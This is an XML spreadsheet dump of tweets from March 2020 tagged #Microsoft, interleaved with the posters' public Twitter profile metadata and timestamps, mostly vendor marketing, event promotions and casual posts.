    <t>{'id': 113675366, 'id_str': '113675366', 'name': 'Excitech', 'screen_name': 'Excitech_Ltd', 'location': 'Enfield, UK', 'description': 'Excitech provides technology solutions and services for the construction sector, supporting the complete project life cycle.', 'url': 'https://t.co/95EKSJQdeu', 'entities': {'url': {'urls': [{'url': 'https://t.co/95EKSJQdeu', 'expanded_url': 'http://www.excitech.co.uk', 'display_url': 'excitech.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1598, 'friends_count': 602, 'listed_count': 66, 'created_at': 'Fri Feb 12 16:45:40 +0000 2010', 'favourites_count': 633, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3482,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'http://pbs.twimg.com/profile_images/783586840322408452/QgxAJlB8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/783586840322408452/QgxAJlB8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/113675366/1475658813', 'profile_link_color': '22C0F1',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</si>
  <si>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13:49:05 +0000 2020</t>
  </si>
  <si>
    <t>Even on the sports field, data is a crucial aspect to success, says @Springboks @andycahoon. It's no different in business, where high-growth companies use data and analytics to discover insights. #PowerOf3 #SAP #Microsoft https://t.co/C6ndan7Dry</t>
  </si>
  <si>
    <t>Thu Mar 05 13:47:56 +0000 2020</t>
  </si>
  <si>
    <t>Anywhere, Anytime learning with Microsoft and Mindware! 
https://t.co/huuv42ciXh
#microsoft #mindware2020 #mindware https://t.co/bN0iDmv9Eo</t>
  </si>
  <si>
    <t>{'id': 2539003550, 'id_str': '2539003550', 'name': 'Mindware', 'screen_name': 'MindwareVAD', 'location': 'Dubai UAE', 'description': 'Leading Distributor of quality IT products to the Middle East and North Africa', 'url': 'https://t.co/aguLGFjCeO', 'entities': {'url': {'urls': [{'url': 'https://t.co/aguLGFjCeO', 'expanded_url': 'http://www.mindware.ae', 'display_url': 'mindware.ae', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1313, 'friends_count': 211, 'listed_count': 1008, 'created_at': 'Sun Jun 01 07:24:52 +0000 2014', 'favourites_count': 6758, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 52618,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'http://pbs.twimg.com/profile_images/557915739533766660/br46HHBE_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/557915739533766660/br46HHBE_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2539003550/1498338313',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</si>
  <si>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13:47:14 +0000 2020</t>
  </si>
  <si>
    <t>Thank you #Microsoft https://t.co/pKrUJLFEQo</t>
  </si>
  <si>
    <t>{'id': 931174365294743554, 'id_str': '931174365294743554', 'name': 'Samir', 'screen_name': 'Samir05112973', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 161, 'friends_count': 720, 'listed_count': 0, 'created_at': 'Thu Nov 16 14:57:23 +0000 2017', 'favourites_count': 66, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 306, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1235452821677498369/oYf6TGim_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235452821677498369/oYf6TGim_normal.jpg',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</si>
  <si>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13:46:05 +0000 2020</t>
  </si>
  <si>
    <t>Thank you #Microsoft https://t.co/avSNQyBPaO</t>
  </si>
  <si>
    <t>Thu Mar 05 13:45:28 +0000 2020</t>
  </si>
  <si>
    <t>Thank you #Microsoft https://t.co/JKUev0btEr</t>
  </si>
  <si>
    <t>Thu Mar 05 13:45:04 +0000 2020</t>
  </si>
  <si>
    <t>A/B Testing strategies to improve #PPC performance https://t.co/fQCzH7eCQi #GoogleAds #FacebookAds #Microsoft Advertising #Amazon</t>
  </si>
  <si>
    <t>Thu Mar 05 13:45:01 +0000 2020</t>
  </si>
  <si>
    <t>Thanks #Microsoft Feb 25th</t>
  </si>
  <si>
    <t>{'id': 1210435145917980674, 'id_str': '1210435145917980674', 'name': 'Adam B Webb', 'screen_name': 'AdamBWebb2', 'location': '', 'description': 'I am Adam Webb and i am not so special. I just want to be the best no matter what i do I am a silly crazy nut..I can say i am stupid somewhat.I am a man but Goo', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 67, 'listed_count': 0, 'created_at': 'Fri Dec 27 05:40:24 +0000 2019', 'favourites_count': 27,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</si>
  <si>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Mar 05 13:44:32 +0000 2020</t>
  </si>
  <si>
    <t>Make your lunchtime count by joining a FREE TRAINING on Thursday 27th March at 1pm for a one-hour interactive training explaining Microsoft Power BI. BOOK https://t.co/0hgGs97Wsv now as limited places available.
#PowerBI, #Microsoft Power BI, #BI Training</t>
  </si>
  <si>
    <t>{'id': 2969625099, 'id_str': '2969625099', 'name': 'Clearly Cloudy', 'screen_name': 'ClearlyCloudyUK', 'location': 'East Sussex, England', 'description': 'Providing Microsoft Azure Cloud Business Intelligence and analytics solutions - Microsoft partner', 'url': 'https://t.co/LBT9ParRq5', 'entities': {'url': {'urls': [{'url': 'https://t.co/LBT9ParRq5', 'expanded_url': 'http://www.ClearlyCloudy.co.uk', 'display_url': 'ClearlyCloudy.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1577, 'friends_count': 2141, 'listed_count': 11, 'created_at': 'Fri Jan 09 13:03:05 +0000 2015', 'favourites_count': 140, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 140,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'http://pbs.twimg.com/profile_images/560382786645659648/LbM1v_KJ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/560382786645659648/LbM1v_KJ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2969625099/1440018826',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</si>
  <si>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13:43:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft boosts Azure big data strategy with Hadoop distro https://t.co/iKeq0dtzuQ #microsoft</t>
  </si>
  <si>
    <t>{'id': 3727769303, 'id_str': '3727769303', 'name': 'CRM_CWS_Cloud', 'screen_name': 'CRM_CWS_Cloud', 'location': 'London, England, #cloud, #SaaS', 'description': 'LinkedIn C.F.R. Read', 'url': 'https://t.co/CvACVLSQkI', 'entities': {'url': {'urls': [{'url': 'https://t.co/CvACVLSQkI', 'expanded_url': 'http://www.crmtrilogix.com', 'display_url': 'crmtrilogix.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 10215, 'friends_count': 4105, 'listed_count': 1423, 'created_at': 'Mon Sep 21 11:36:11 +0000 2015', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 223575,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'http://pbs.twimg.com/profile_images/663996468605419520/mJ7ozB8L_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/663996468605419520/mJ7ozB8L_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3727769303/1447144146',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</si>
  <si>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13:41:39 +0000 2020</t>
  </si>
  <si>
    <t>Latest quiz question for Thursday Technology in mobile app development. #ThursdayThoughts #remotedevelopers #microsoft #ITCompany #Thrusdaytechquiz https://t.co/fCjEaQlClS</t>
  </si>
  <si>
    <t>{'id': 999922098322616321, 'id_str': '999922098322616321', 'name': 'Hirebestxamarindeveloper', 'screen_name': 'hirebestxamarin', 'location': '603, Shekhar Central, Indore', 'description': 'Advanced Bright Future of Xamarin is just one click ahead', 'url': 'https://t.co/HjnPQ61Kh7', 'entities': {'url': {'urls': [{'url': 'https://t.co/HjnPQ61Kh7', 'expanded_url': 'http://www.hire-best-xamarin-developers.com/', 'display_url': 'hire-best-xamarin-developers.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 54, 'listed_count': 0, 'created_at': 'Fri May 25 07:56:20 +0000 2018', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 25, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1017359382919536640/kOQyhnSW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1017359382919536640/kOQyhnSW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/999922098322616321/1531392490',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</si>
  <si>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13:41:26 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Good Morning Everybody! 
#xbox #xboxone #masterchief #halo5 #microsoft #guns #2ndamendment #america #pyrography #woodburning #pyrographyart #games #gamerguy #gamer #gamer4life #destinythegame #samsung... https://t.co/kCuyWnYCBm</t>
  </si>
  <si>
    <t>Thu Mar 05 13:40:54 +0000 2020</t>
  </si>
  <si>
    <t>It was fun presenting today on Analytics and AI especially Azure ML and Video Indexer on Azure Media Services at Microsoft as well as meet some lovely people  #azure #microsoft #azurethursday #azurethursdaylk #ai #analytics</t>
  </si>
  <si>
    <t>{'id': 1948886594, 'id_str': '1948886594', 'name': 'Nuzhi Meyen', 'screen_name': 'NMeyen', 'location': 'Sri Lanka', 'description': 'FinTech Startup Co-Founder. Deep Learning Enthusiast. Data Architect. Business Consultant. Learning Jujitsu. Uncle', 'url': 'https://t.co/w0xsVRER6f', 'entities': {'url': {'urls': [{'url': 'https://t.co/w0xsVRER6f', 'expanded_url': 'http://www.heliosp2p.com', 'display_url': 'heliosp2p.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 279, 'friends_count': 1829, 'listed_count': 12, 'created_at': 'Wed Oct 09 08:30:54 +0000 2013', 'favourites_count': 187, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 850,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'http://pbs.twimg.com/profile_images/1125013536646635521/0LXRHV10_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1125013536646635521/0LXRHV10_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1948886594/1447738607',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</si>
  <si>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13:39:32 +0000 2020</t>
  </si>
  <si>
    <t>Whos an excel wizard here and can help me create a nice map? #Excel #Microsoft #excelsheet</t>
  </si>
  <si>
    <t>{'id': 252259665, 'id_str': '252259665', 'name': 'Jinane', 'screen_name': 'jinaneAZ', 'location': 'Lebanon', 'description': 'Beirut-based human', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 923, 'friends_count': 681, 'listed_count': 8, 'created_at': 'Mon Feb 14 20:48:15 +0000 2011', 'favourites_count': 7245, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15353, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '4D8E9E', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1225520087509164033/qepy9ncg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225520087509164033/qepy9ncg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/252259665/1576060431', 'profile_link_color': 'EB5E5E', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '6E1257', 'profile_text_color': '10FF03', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 13:38:47 +0000 2020</t>
  </si>
  <si>
    <t>Almost 23% of market-share for collaborative software is Microsoft SharePoint , check link. Need certified Microsoft SharePoint experts ? Let's talk https://t.co/hRzJC7a1Pv #sharepoint #microsoftsharepoint #microsoftgoldpartner #microsoft #customsoftwaredevelopment https://t.co/WVhZVDj1tp</t>
  </si>
  <si>
    <t>{'id': 1227565385483866112, 'id_str': '1227565385483866112', 'name': 'Mike Turner', 'screen_name': 'MikeDotNetPro', 'location': 'Ahmedabad', 'description': 'DOT NET Consultant | Microsoft Gold Certified Partner | Custom Software | ERP | CRM | StartUp Advisor | Technocrat', 'url': 'https://t.co/mEI5WA7aRx', 'entities': {'url': {'urls': [{'url': 'https://t.co/mEI5WA7aRx', 'expanded_url': 'http://www.manektech.com', 'display_url': 'manektech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 15, 'friends_count': 134, 'listed_count': 0, 'created_at': 'Wed Feb 12 12:09:37 +0000 2020', 'favourites_count': 26,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'http://pbs.twimg.com/profile_images/1227565892227063808/DVfY060a_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227565892227063808/DVfY060a_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1227565385483866112/1581511377',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</si>
  <si>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13:35:40 +0000 2020</t>
  </si>
  <si>
    <t>@Azure Update of the day:
#Microsoft #microsoftazure #Azure #linkedinlearning
https://t.co/FQiwFYuR5l</t>
  </si>
  <si>
    <t>Thu Mar 05 13:35:37 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A14) 
D) Washington
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft
Join.
@EktaPat22226716
@Soniyaskjain1 
@CHARMYSKJ 
@sanchitabhartiy
@tweetysweetie_2 
@imPalak18 
@RubyAga9339 
@75SWARUPGHOSH 
@Navyavegi</t>
  </si>
  <si>
    <t>{'id': 1210276287278796800, 'id_str': '1210276287278796800', 'name': 'MISHI', 'screen_name': 'MISHI33905752', 'location': '', 'description': 'LOVE TO win\n\n100 follow back', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 128, 'friends_count': 1281, 'listed_count': 0, 'created_at': 'Thu Dec 26 19:08:55 +0000 2019', 'favourites_count': 10162, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12134, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1228030272643444736/-6hXJBTH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228030272643444736/-6hXJBTH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1210276287278796800/1582291131',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</si>
  <si>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13:35:30 +0000 2020</t>
  </si>
  <si>
    <t>"This is a valued partnership for @AccentureSA!" #PowerOf3 #SAP #Microsoft #Azure https://t.co/PR0A2cBXyw</t>
  </si>
  <si>
    <t>Thu Mar 05 13:35:00 +0000 2020</t>
  </si>
  <si>
    <t>HPE's Mark Evans runs through some of the key reasons to choose #AzureStack to power your #HybridCloud strategy. Watch in full: https://t.co/9ndgxKnx9c
#HPEAlliances #Microsoft #MSPartner #AzureStackHub https://t.co/l3fl52VKbt</t>
  </si>
  <si>
    <t>Thu Mar 05 13:34:02 +0000 2020</t>
  </si>
  <si>
    <t>You ready for 100s of new features in #Microsoft's Wave 1 set of updates for Dynamics 365 CRM and ERP and Power Platform? I am! @ZDNet #cdwsocial https://t.co/RGPj6EAzh5</t>
  </si>
  <si>
    <t>Thu Mar 05 13:33:12 +0000 2020</t>
  </si>
  <si>
    <t>The Insolvency Service processes claims up to 4x faster with IBM Services and Microsoft technologies. #IBM #Microsoft #Debt https://t.co/wJVMRlGakF</t>
  </si>
  <si>
    <t>{'id': 14378628, 'id_str': '14378628', 'name': 'Yan Rozovsky', 'screen_name': 'YanRozovsky', 'location': 'Bi-Coastal', 'description': 'Helping Customers Cross Digital &amp; Cloud Chasm. Tech &amp; Digital Executive. Vast Strategy &amp; Leadership Experience. Enjoy meeting thought provoking people', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 11771, 'friends_count': 13567, 'listed_count': 556, 'created_at': 'Sun Apr 13 22:37:09 +0000 2008', 'favourites_count': 2070, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 18651, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'C0DEED', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/929697432920879105/WWst0o6d_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/929697432920879105/WWst0o6d_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14378628/1510669051', 'profile_link_color': 'ABB8C2',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</si>
  <si>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13:32:19 +0000 2020</t>
  </si>
  <si>
    <t>Implementing Dynamics 365 can help your business run effectively and successfully.
In our latest blog, we explore the benefits of Dynamics 365 and how it can drive positive change in your business! https://t.co/i6LUWDfTrn
#Dynamics365 #Microsoft #Software https://t.co/rvMiaHWJi7</t>
  </si>
  <si>
    <t>{'id': 1031517068, 'id_str': '1031517068', 'name': 'Matt Oldfield', 'screen_name': 'dynamix_matt', 'location': 'Yorkshire, UK', 'description': 'IT Consultant -  Specialising in solutions for  the waste &amp; recycling industry.', 'url': 'https://t.co/UWQkER95YQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/UWQkER95YQ', 'expanded_url': 'http://dynamix.co.uk', 'display_url': 'dynamix.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5290, 'friends_count': 4034, 'listed_count': 47, 'created_at': 'Sun Dec 23 23:13:54 +0000 2012', 'favourites_count': 1111, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2929,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'http://pbs.twimg.com/profile_images/1023300719166857218/sdWSkLXq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1023300719166857218/sdWSkLXq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1031517068/1506941091',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</si>
  <si>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13:31:39 +0000 2020</t>
  </si>
  <si>
    <t>Let's get #cognitive! 
To all the Microsoft Cognitive Services and Bot enthusiast: Do not miss @sebastianzolg's first meetup in our facilities in Berne about #Microsoft #Bots, #AI and more and help to build a #community. 
Register now: https://t.co/zTAfB45kWj</t>
  </si>
  <si>
    <t>{'id': 1171447742, 'id_str': '1171447742', 'name': 'Swisscom_Career', 'screen_name': 'Swisscom_Career', 'location': 'Schweiz', 'description': 'Are you ready to shape the future? Follow us for the latest jobs, culture, events and how our employees inspire people in the networked world! #WeAreSwisscom', 'url': 'https://t.co/qaHEJ4IIuG', 'entities': {'url': {'urls': [{'url': 'https://t.co/qaHEJ4IIuG', 'expanded_url': 'https://www.swisscom.ch/de/about/jobs/offene-stellen.html', 'display_url': 'swisscom.ch/de/about/jobs/â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1692, 'friends_count': 554, 'listed_count': 151, 'created_at': 'Tue Feb 12 09:30:35 +0000 2013', 'favourites_count': 907, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1983, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EDEDED', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1083750021575729152/fbHDPdyn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1083750021575729152/fbHDPdyn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1171447742/1538047972', 'profile_link_color': '3981D0',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</si>
  <si>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13:30:13 +0000 2020</t>
  </si>
  <si>
    <t>Hundreds of #Microsoft sub-domains open to #hijacking https://t.co/Pdwsk4hdt2 #SecurityAffairs</t>
  </si>
  <si>
    <t>Thu Mar 05 13:30:05 +0000 2020</t>
  </si>
  <si>
    <t>Top #Trend of #Microsoft #Dynamic #CRM in 2020. Contact @otssolutions for latest updates. https://t.co/joxCYmCR2u https://t.co/Wb8I7L7zJw</t>
  </si>
  <si>
    <t>{'id': 42833544, 'id_str': '42833544', 'name': 'OTS Solutions', 'screen_name': 'otssolutions', 'location': 'Dallas, TX', 'description': 'Tweeting about @Tech @startups @IT @Cloud @Mobile. Leading global tech firm, providing great teams and experts to help transform ideas into digital products.', 'url': 'https://t.co/wlVGa7K8ig', 'entities': {'url': {'urls': [{'url': 'https://t.co/wlVGa7K8ig', 'expanded_url': 'https://otssolutions.com/', 'display_url': 'otssolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1813, 'friends_count': 3451, 'listed_count': 106, 'created_at': 'Wed May 27 06:56:44 +0000 2009', 'favourites_count': 200, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2034, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '89C9FA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/774325409114574848/JONfgY8T_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/774325409114574848/JONfgY8T_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/42833544/1473777930', 'profile_link_color': 'ABB8C2',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</si>
  <si>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13:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Want to find data that you can trust? Michael Lucas explains how we do it at Microsoft. #data #Microsoft https://t.co/6j3o3BjJh4</t>
  </si>
  <si>
    <t>Yet another #Top10 list from @businessinsider tech reporter @CWoodJournalist keep them coming. #Facebook #seattlecoronavirus #IBM #event #etsy #robinhood #classaction #Microsoft #britishpolice #SoftBank #Apple #store #amazon #Retail</t>
  </si>
  <si>
    <t>{'id': 1219272792937508864, 'id_str': '1219272792937508864', 'name': 'weappurideas', 'screen_name': 'weappurideas', 'location': '', 'description': 'The goal we have set for ourselves is to provide every innovative and creative mind the need to grow beyond their current goals.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 10, 'listed_count': 1, 'created_at': 'Mon Jan 20 14:59:22 +0000 2020', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 35, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1224089446645145600/Yv-hLmoY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224089446645145600/Yv-hLmoY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1219272792937508864/1580680789',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</si>
  <si>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Good morning #SMB: Microsoft Complete: Is it worth the money? https://t.co/kTCa5Zep7c via @mspoweruser #Microsoft #TechNews</t>
  </si>
  <si>
    <t>{'id': 96131713, 'id_str': '96131713', 'name': 'DirectDial.com', 'screen_name': 'DirectDialcom', 'location': 'London, Ontario', 'description': 'Canadian supplier of  IT services &amp; solutions since 1997. We take IT from idea to accomplishment. Toll Free: 866-807-9832. #Technology #Business #Computers #SMB', 'url': 'https://t.co/GGIGn6d4xm', 'entities': {'url': {'urls': [{'url': 'https://t.co/GGIGn6d4xm', 'expanded_url': 'http://www.directdial.com', 'display_url': 'directdial.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 760, 'friends_count': 645, 'listed_count': 286, 'created_at': 'Fri Dec 11 14:03:39 +0000 2009', 'favourites_count': 452, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13310,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'http://pbs.twimg.com/profile_images/1156594770111868928/XAEH0TLi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1156594770111868928/XAEH0TLi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/96131713/1564589304', 'profile_link_color': '185D72', 'profile_sidebar_border_color': 'CDD0D1', 'profile_sidebar_fill_color': 'CDD0D1', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 13:29:35 +0000 2020</t>
  </si>
  <si>
    <t>I'm really enjoying the #Microsoft #PowerPoint Presenter Coach feature.  
With Coach you get real time onscreen feedback in a rehearsal report with practical tips to improve for better presentations. 
https://t.co/r4azzx4z1R https://t.co/6RDlEadg5V</t>
  </si>
  <si>
    <t>{'id': 2478876503, 'id_str': '2478876503', 'name': 'Cheryn (Baier) Ridge', 'screen_name': 'CherynBaier', 'location': 'Cape Town, South Africa', 'description': '#MSFTEduChat Host, #MicrosoftEdu Master Trainer, #MinecraftEdu Global Mentor &amp; Trainer, @ZAEdu Teacher, FLL Coach, @C4Kofficial Teacher Trainer', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 309, 'friends_count': 499, 'listed_count': 21, 'created_at': 'Sat Apr 12 13:27:38 +0000 2014', 'favourites_count': 1219, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 996,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'http://pbs.twimg.com/profile_images/1203655398508683264/3ZYQJIIc_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1203655398508683264/3ZYQJIIc_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2478876503/1581276567',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</si>
  <si>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13:28:01 +0000 2020</t>
  </si>
  <si>
    <t>The Power Platform Online Conference 2020 Schedule https://t.co/PAqqufshKZ #Microsoft #PowerAutomate #Flow</t>
  </si>
  <si>
    <t>Thu Mar 05 13:26:28 +0000 2020</t>
  </si>
  <si>
    <t>New portrait... #drawing #Sketching #sketchbook #sketch #cat #portraitartist #doodle #artragepro #artrage #surfacepro #artist #pencildrawing #draw_portrait #microsoft #beard #edc_cooperative #artist... https://t.co/bYUoaTUf82</t>
  </si>
  <si>
    <t>{'id': 32421348, 'id_str': '32421348', 'name': 'DaveADavidson.com', 'screen_name': 'dave_A_davidson', 'location': 'Chesterfield, UK', 'description': 'Artist, runner and someone with issues https://t.co/ocgvkVX5Xe', 'url': 'https://t.co/lWUgy3osqP', 'entities': {'url': {'urls': [{'url': 'https://t.co/lWUgy3osqP', 'expanded_url': 'https://www.strava.com/athletes/980858', 'display_url': 'strava.com/athletes/980858', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/ocgvkVX5Xe', 'expanded_url': 'https://m.facebook.com/daveadavidson', 'display_url': 'm.facebook.com/daveadavidson', 'indices': [39, 62]}]}}, 'protected': False, 'followers_count': 4056, 'friends_count': 1404, 'listed_count': 540, 'created_at': 'Fri Apr 17 14:19:03 +0000 2009', 'favourites_count': 1898, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 98310, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '050404', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1191243856597147648/SJlV5BWO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1191243856597147648/SJlV5BWO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/32421348/1582909556', 'profile_link_color': '909199', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '050505', 'profile_text_color': '7C7B85', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 13:22:36 +0000 2020</t>
  </si>
  <si>
    <t>What are some use-cases for Internet of Things? By @Fisher85M
#healthcare #Energy #utilities #Sustainability #Economy #homedecor #HomeImprovement #Automation #SmartCities #Apple #google #Microsoft #AWE #Infrastructure #Algorithms #IOT #IIOT @charlieisaacs #salesforce https://t.co/Gv7QxWDnMV</t>
  </si>
  <si>
